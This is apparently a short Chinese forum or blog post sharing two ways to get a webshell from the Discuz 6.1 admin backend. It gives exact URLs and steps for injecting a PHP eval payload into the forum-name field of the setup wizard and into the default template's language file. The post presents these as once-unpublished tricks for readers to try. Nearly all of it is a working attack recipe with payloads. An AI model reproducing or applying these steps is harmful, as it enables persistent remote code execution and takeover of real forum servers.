好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
1:http://127.0.0.1/admincp.php?action=runwizard&frames=yesadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell<?php eval($_POST[cmd]);?>后台webshell地址:http://127.0.0.1/forumdata/logs/runwizardlog.php
2:后台模板管理–默认模板套系–详情templates/default/actions.lang.phpjhackj\\’);eval($_POST[cmd])?>;//
利用很简单,聪明的人一看就懂了
进入【版块】-【模板管理】,在【默认模板】后面点击【详情】,在【Discuz!语言包】下面点击【actions】后的【编辑】,拉到最后面,在【guest】里面把【游客】改为 游客\\\\\\\\’);eval($_POST[c]);echo (""//
http://127.0.0.1/templates/default/actions.lang.php
标签分类: 脚本安全
正如我总是意犹未尽的想起你。
